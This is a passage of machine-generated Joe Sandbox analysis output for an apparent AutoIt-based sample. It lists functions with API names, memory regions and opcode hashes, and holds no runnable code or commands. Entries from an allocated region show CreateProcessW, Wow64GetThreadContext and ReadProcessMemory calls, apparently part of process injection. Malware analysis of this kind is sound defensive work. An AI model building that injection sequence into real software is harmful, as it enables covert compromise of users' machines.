                                                            • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction Fuzzy Hash: 13E012A16017094ACB64A578B941AA353DC4F58352B18091DB50DD7186CE64F842E134
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: 56a08627b42d5a1f1b05ba088c68933acece4afe347a5a005448b347e87b53cf
                                                            • Instruction ID: 66a5e2f0dd91a597977a93b9692e19e2d6bbb4254c6bc3f85edd370f1ebd87d8
                                                            • Opcode Fuzzy Hash: 56a08627b42d5a1f1b05ba088c68933acece4afe347a5a005448b347e87b53cf
                                                            • Instruction Fuzzy Hash: 95224874508301DFCB24DF14C490A6ABBE1FF84314F15895EEA9A8B362D731ED85DB92
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: EA06
                                                            • API String ID: 4104443479-3962188686
                                                            • Opcode ID: 93db2e842341645bddc1ee431b35a7b67b74c055388fb809a927b846b04f7ef4
                                                            • Instruction ID: 6978b4660da8b96895a7b0ed4f28826d964330f7dfb9b20f8239ea88f8e3ec89
                                                            • Opcode Fuzzy Hash: 93db2e842341645bddc1ee431b35a7b67b74c055388fb809a927b846b04f7ef4
                                                            • Instruction Fuzzy Hash: B4415B21A041586BDF299B54C8927BFBFA39B45300F284477EB869B382D6309E4493A1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                            • Instruction ID: 59dfce235b24f8bc9323aa1e81bc4ffb35610179a2d702a7994859434275dd36
                                                            • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                            • Instruction Fuzzy Hash: 053188B5604506AFC704DF69C8D1D69F3A5FF48710715872AE629CB391FB30E950DB90
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00CD4834
                                                              • Part of subcall function 00CF336C: __lock.LIBCMT ref: 00CF3372
                                                              • Part of subcall function 00CF336C: DecodePointer.KERNEL32(00000001,?,00CD4849,00D27C74), ref: 00CF337E
                                                              • Part of subcall function 00CF336C: EncodePointer.KERNEL32(?,?,00CD4849,00D27C74), ref: 00CF3389
                                                              • Part of subcall function 00CD48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00CD4915
                                                              • Part of subcall function 00CD48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00CD492A
                                                              • Part of subcall function 00CD3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CD3B68
                                                              • Part of subcall function 00CD3B3A: IsDebuggerPresent.KERNEL32 ref: 00CD3B7A
                                                              • Part of subcall function 00CD3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D952F8,00D952E0,?,?), ref: 00CD3BEB
                                                              • Part of subcall function 00CD3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00CD3C6F
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00CD4874
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 1438897964-0
                                                            • Opcode ID: 4cbc7b7eb5d643edadee897ff0aafb3b289900290ef8437d423e4bd4329b29aa
                                                            • Instruction ID: ada0818317ce15ca0cdc297f52dcd85e8859285f78625c2ce952293a328ab895
                                                            • Opcode Fuzzy Hash: 4cbc7b7eb5d643edadee897ff0aafb3b289900290ef8437d423e4bd4329b29aa
                                                            • Instruction Fuzzy Hash: 09118C719083459FC700EF69EC0590ABBE8EB89750F10452BF540D73B1DB709649DBA6
                                                            APIs
                                                              • Part of subcall function 00CF571C: __FF_MSGBANNER.LIBCMT ref: 00CF5733
                                                              • Part of subcall function 00CF571C: __NMSG_WRITE.LIBCMT ref: 00CF573A
                                                              • Part of subcall function 00CF571C: RtlAllocateHeap.NTDLL(013F0000,00000000,00000001,00000000,?,?,?,00CF0DD3,?), ref: 00CF575F
                                                            • std::exception::exception.LIBCMT ref: 00CF0DEC
                                                            • __CxxThrowException@8.LIBCMT ref: 00CF0E01
                                                              • Part of subcall function 00CF859B: RaiseException.KERNEL32(?,?,?,00D89E78,00000000,?,?,?,?,00CF0E06,?,00D89E78,?,00000001), ref: 00CF85F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: 45935d05c48d2d7c515d9eb909ce7bf3d0481c6f0129b11ec40d4c74fdf30183
                                                            • Instruction ID: 3648e636234c68df52763efa9026d3f0924e7736779291d009675a36ac8f28dc
                                                            • Opcode Fuzzy Hash: 45935d05c48d2d7c515d9eb909ce7bf3d0481c6f0129b11ec40d4c74fdf30183
                                                            • Instruction Fuzzy Hash: D8F0A47190021E67DB50BA94EC11AFEBBAC9F11751F204426FB1496292DF709A44E6E3
                                                            APIs
                                                              • Part of subcall function 00CF8B28: __getptd_noexit.LIBCMT ref: 00CF8B28
                                                            • __lock_file.LIBCMT ref: 00CF53EB
                                                              • Part of subcall function 00CF6C11: __lock.LIBCMT ref: 00CF6C34
                                                            • __fclose_nolock.LIBCMT ref: 00CF53F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: 0d4b762eef894ea6bfbd7dbfd7911da121183dc284099ce06771c167992d27b6
                                                            • Instruction ID: eccab37bc6c216184c4d49b3cc582bceb24ffc9052bb5db77dd7b3eb92228e85
                                                            • Opcode Fuzzy Hash: 0d4b762eef894ea6bfbd7dbfd7911da121183dc284099ce06771c167992d27b6
                                                            • Instruction Fuzzy Hash: 39F09631900A0C9BDB916B799C017BD66A06F41374F218105A764AB1D1CBFC4A497B53
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 013C1A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013C1AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013C1B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_13c0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
                                                            • Instruction ID: 27453cfa4a15ac1cb54eff94a45701db1abddd078592592ef6e972e2984a3a3e
                                                            • Opcode Fuzzy Hash: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
                                                            • Instruction Fuzzy Hash: 6212CD24E24658C6EB24DF64D8507DEB232EF68700F1090ED910DEB7A5E77A4E81CF5A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 16dc2f124540186d8028898e0c315b0fde7bfaab2343429d1282f31bb18d8ede
                                                            • Instruction ID: ff9e2d760c8c5c183b032755f181132f10a85cb1b6010aff5647acf0dbc0c0bd
                                                            • Opcode Fuzzy Hash: 16dc2f124540186d8028898e0c315b0fde7bfaab2343429d1282f31bb18d8ede
                                                            • Instruction Fuzzy Hash: 8541F474608341DFDB24DF24C484B1ABBE1BF85318F1988ADE9998B762C772EC45CB52
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 3382ed75bb926a2c6ef61da3d2c5274c56f4765570a2432cc1a3d111fdf85456
                                                            • Instruction ID: 70d731f59e47972ec09d1721e381f5cd8d79972a6a4161605a82f5a0a9d7eafa
                                                            • Opcode Fuzzy Hash: 3382ed75bb926a2c6ef61da3d2c5274c56f4765570a2432cc1a3d111fdf85456
                                                            • Instruction Fuzzy Hash: 1E213872614B08FBEB144F26E841B79BBB4FB14350F24892FE589C5290EB3181D0D765
                                                            APIs
                                                              • Part of subcall function 00CD4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00CD4BEF
                                                              • Part of subcall function 00CF525B: __wfsopen.LIBCMT ref: 00CF5266
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CD4E0F
                                                              • Part of subcall function 00CD4B6A: FreeLibrary.KERNEL32(00000000), ref: 00CD4BA4
                                                              • Part of subcall function 00CD4C70: _memmove.LIBCMT ref: 00CD4CBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: c98e0f4224676b7b744665df105cd49fb60d531d4b973d9f51f325279c4408f8
                                                            • Instruction ID: de65aada3334912a695f042fdb875220ddc6ef593d9d54d0ad34e4a5952de64c
                                                            • Opcode Fuzzy Hash: c98e0f4224676b7b744665df105cd49fb60d531d4b973d9f51f325279c4408f8
                                                            • Instruction Fuzzy Hash: 3011A731600305BBCF19BFB1C816F6DB7A5AF44710F10842FFB45AB681DA719905A761
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 28a6335a0b77824eeb17bba264b2cca6e0b30eb111f9b232e1a1ae4e97f74772
                                                            • Instruction ID: fb0afcf51178d97363f7c28be758cd3ca7ed970dd0e7ad7d368f4e1cf489b453
                                                            • Opcode Fuzzy Hash: 28a6335a0b77824eeb17bba264b2cca6e0b30eb111f9b232e1a1ae4e97f74772
                                                            • Instruction Fuzzy Hash: 15213374908301DFCB14DF24C444A2ABBE1BF88314F058968FA9A87722D731E809CBA3
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 00CF48A6
                                                              • Part of subcall function 00CF8B28: __getptd_noexit.LIBCMT ref: 00CF8B28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: 30b0fdc0b5658cd33a34931cb7ea009276a8abd39ccd5669f724fa03c05dc292
                                                            • Instruction ID: 3b00984defcd46381c6715e7bb759c3991829eb3a48d3919fa9f00934952afd0
                                                            • Opcode Fuzzy Hash: 30b0fdc0b5658cd33a34931cb7ea009276a8abd39ccd5669f724fa03c05dc292
                                                            • Instruction Fuzzy Hash: 4CF02D3190020DEBEF99AFB48C063BF36A0AF00761F058404F620EA1C1CBB88A50EB53
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CF07B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath
                                                            • String ID:
                                                            • API String ID: 82841172-0
                                                            • Opcode ID: 7fbafeae321e6022c238e96fe08b3ff242bec264dd274e7a4e42338809bc9fc6
                                                            • Instruction ID: feda08d06ee3de4e4a0c75b9def2b26cdebf3d2af2a5dfe55fc6b95a0c6c8e3e
                                                            • Opcode Fuzzy Hash: 7fbafeae321e6022c238e96fe08b3ff242bec264dd274e7a4e42338809bc9fc6
                                                            • Instruction Fuzzy Hash: 38F0E936945294DBD32267286801EF47B58EF87320F0506E7FC58C7D11D5204D4ACBE2
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,00D952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CD4E7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 07ee47983c59a85bb95612978b92c16d9a6f287cd5f7e4140553f8289a34736a
                                                            • Instruction ID: 8f3d970c7d272dcadedd47573e1ffd5c53abbaab95263135b7a2bf465279282c
                                                            • Opcode Fuzzy Hash: 07ee47983c59a85bb95612978b92c16d9a6f287cd5f7e4140553f8289a34736a
                                                            • Instruction Fuzzy Hash: 5EF01575501B11EFCB389F65E494822FBE1BF143293208A3EE3E682B20C7329844DB50
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CF07B0
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: 89b42b7aeb060c537c95531b3b51e26a8f3ea46fc5b9859d032165ba577311b4
                                                            • Instruction ID: 01031e00000dd8c4ee7d1659f10052fa82fef01a1eecd30ab8c109502bc29a83
                                                            • Opcode Fuzzy Hash: 89b42b7aeb060c537c95531b3b51e26a8f3ea46fc5b9859d032165ba577311b4
                                                            • Instruction Fuzzy Hash: 7FE0867690422857C720A6689C05FEA77DDDB887A1F0441B6FD0CD7344D9609C8086E0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: 682ab1f5047a843c4b53989eabb62e476773f9a2e8209be3b99bd1c301aae4ef
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: DBB0927644020C7BCE012A82FC02A593F199B41764F408020FB0C18162A673A664AA8A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 2dbcd2babc60c3bfeb09caaffe6dd63ded9dbbe1383b16a8f5d3dd06da47369e
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: AE31F5B4A001099BC758DF09C484979FBA6FB49700B3487A5E91ACB356D731EEC1DBC2
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 013C22B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_13c0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                            • Instruction ID: a016ef5ba54121e053e72cf829cbcc957f8ceaa092e463b78f3c7a37956fddf7
                                                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                            • Instruction Fuzzy Hash: 37E0BF7494020EEFDB00EFA8D5496DE7BB4EF04711F1005A5FD05D7681DB319E548A62
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 013C22B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_13c0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 7b6882b290192f94afdfc025f91d5635aec46c1dc5234d51acf4a1222c1f3877
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 8AE0E67494020EDFDB00EFB8D54969E7FB4EF04701F100165FD01D2281D6319D508A72
